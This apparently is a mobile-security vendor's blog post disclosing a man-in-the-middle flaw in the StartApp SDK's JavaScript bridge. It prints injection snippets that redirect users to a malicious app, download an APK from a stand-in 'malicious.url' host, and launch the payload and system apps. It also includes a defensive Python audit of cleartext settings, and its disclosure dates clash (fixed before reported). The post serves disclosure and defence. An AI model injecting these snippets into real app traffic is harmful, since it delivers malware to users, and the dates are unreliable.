
Mobile Threat Blog


Javascript bridges let mobile app developers open a new path for their app to be controlled via a remote server. By using a Javascript bridge (i.e., JavascriptInterface), an app’s internal functions can be invoked by downloading and running Javascript from a remote website. However, when these connections are not protected, that path is vulnerable to Man-in-the-Middle (MITM) attacks. If an attacker can intercept, modify, or inject malicious JS code, the Javascript bridge methods can use the app’s own native code to leak data or compromise the device. In this blog, we give an example of how apps with an exposed Javascript bridge can be compromised via a MITM attack to deliver a malicious payload and launch any app on a device.

The Javascript Bridge vulnerability existed in the StartApp SDK, an advertising SDK that claims to be in 40% of the top grossing apps, processing 15TB of advertising data per day. Among 15,940 apps in Appthority’s database connecting to the StartApp server, we found a total of 86 apps with exposed Javascript bridge connections, where 67 of them are still present on Google Play with up to 175 million downloads. Affected apps are also present in 7% of our customer enterprise environments.

The apps using the StartApp SDK communicate with the servers at startappservice.com and startappexchange.com without HTTPS. Thus, these connections are vulnerable to a MITM attack. Moreover, the SDK contains Javascript bridge methods named “externalLinks” and “openApp” under the com.startapp.android.publish.JSInterface class shown in the following code:

First, to launch a MITM attack, an attacker may set up a malicious Wi-Fi network in a public place, such as an airport or coffee shop. The attacker can now intercept connections from the StartApp SDK since they are not encrypted, and inject phishing attacks into the vulnerable app as shown in the video below:

The attacker can then redirect the user to any malicious app. There are two ways in which users can be redirected using the Javascript bridge vulnerability of the StartApp SDK: a malicious app on the official Play Store,

window.location.replace("market://details?id=com.malicious.app.package.name");

or a link containing a malicious app

startappwall.externalLinks("http://malicious.url/com.malicious.app.package.name.apk");

Once the user installs the malicious payload, it can be launched at any time from the app containing the StartApp SDK using the “openApp” method. This malicious payload can be malware, a trojan, or adware, and perform any malicious behaviors that an attacker wants. Note that the remote MITM attacker can also launch many system apps, as shown below, including Gmail, Photo Gallery, Camera and Calendar on the devices using the Javascript Bridge.

<script type="text/javascript">
   function Attack() {
       startappwall.openApp("", "com.malicious.app.package.name", ""); // Launch the sideloaded payload
       startappwall.openApp("", "com.android.vending", "");             // Launch Google Play
       startappwall.openApp("", "com.google.android.gm", "");           // Launch Gmail
       startappwall.openApp("", "com.google.android.GoogleCamera", ""); // Launch Camera
       startappwall.openApp("", "com.google.android.calendar", "");     // Launch Calendar
       startappwall.openApp("", "com.android.gallery3d", "");           // Launch Photo Gallery
   }
</script>

MITM attacks can happen whenever an app’s network connection isn’t encrypted. In this case, these attacks are particularly concerning because the native code and functionality of an app are exposed using an interface designed for scripting and automated action.
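As an added example (not Appthority’s or StartApp’s code), the following Python audit applies Android’s cleartext-traffic rules to an app’s targetSdkVersion, its android:usesCleartextTraffic attribute and its network_security_config.xml, and reports whether plain HTTP to the two SDK hosts named above would still be allowed; the sample config and the legacy.example.com host are constructed for the demonstration.

```python
"""Audit whether an Android app could still send cleartext HTTP to the
StartApp SDK hosts named in the post.  Rules modelled: a network security
config, when present, overrides android:usesCleartextTraffic; cleartext is
off by default from targetSdk 28; the most specific matching <domain>
decides.  Inheritance between nested <domain-config> elements is not
modelled (each element falls back to the base default)."""
import xml.etree.ElementTree as ET

SDK_HOSTS = ["startappservice.com", "startappexchange.com"]  # hosts from the post


def _flag(elem, default):
    """Read cleartextTrafficPermitted from an element, or fall back."""
    v = elem.get("cleartextTrafficPermitted") if elem is not None else None
    return default if v is None else v.lower() == "true"


def cleartext_allowed(host, target_sdk, uses_cleartext=None, nsc_xml=None):
    """Return True if the app may send plain HTTP to `host`."""
    default = target_sdk < 28  # platform default flipped at API 28
    if nsc_xml is None:
        return default if uses_cleartext is None else uses_cleartext
    root = ET.fromstring(nsc_xml)
    allowed = _flag(root.find("base-config"), default)
    best = -1  # longest matching domain name wins
    for dc in root.iter("domain-config"):
        for d in dc.findall("domain"):
            name = (d.text or "").strip().lower()
            subs = d.get("includeSubdomains", "false").lower() == "true"
            if (host == name or (subs and host.endswith("." + name))) and len(name) > best:
                best, allowed = len(name), _flag(dc, default)
    return allowed


def audit(target_sdk, uses_cleartext=None, nsc_xml=None):
    """Map each SDK host to whether the MITM-exposed cleartext path is open."""
    return {h: cleartext_allowed(h, target_sdk, uses_cleartext, nsc_xml) for h in SDK_HOSTS}


# Constructed sample config: block cleartext everywhere except one
# hypothetical legacy host that the app itself owns.
SAMPLE_NSC = """<?xml version="1.0" encoding="utf-8"?>
<network-security-config>
  <base-config cleartextTrafficPermitted="false"/>
  <domain-config cleartextTrafficPermitted="true">
    <domain includeSubdomains="true">legacy.example.com</domain>
  </domain-config>
</network-security-config>"""

if __name__ == "__main__":
    print(audit(26))                      # old target SDK: both hosts reachable over HTTP
    print(audit(26, nsc_xml=SAMPLE_NSC))  # the config closes both paths
```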

Recommendations

  • Only use apps that use strong encryption
  • Do not install unknown apps even if they are redirected from an existing app, only install apps from trusted app stores such as Google Play and the Apple App Store
  • Avoid connecting to untrusted WiFi networks, such as public networks in airports and coffee shops
  • Appthority customers are automatically protected. Appthority MTP detects MITM attacks, lets users identify and remediate apps with unencrypted connections, and detects sideloaded apps.

Disclosure: Appthority reported this issue to StartApp on 21 Dec 2017. StartApp has been very responsive in fixing this vulnerability and has informed Appthority that it was fixed on 20 Jan 2017.
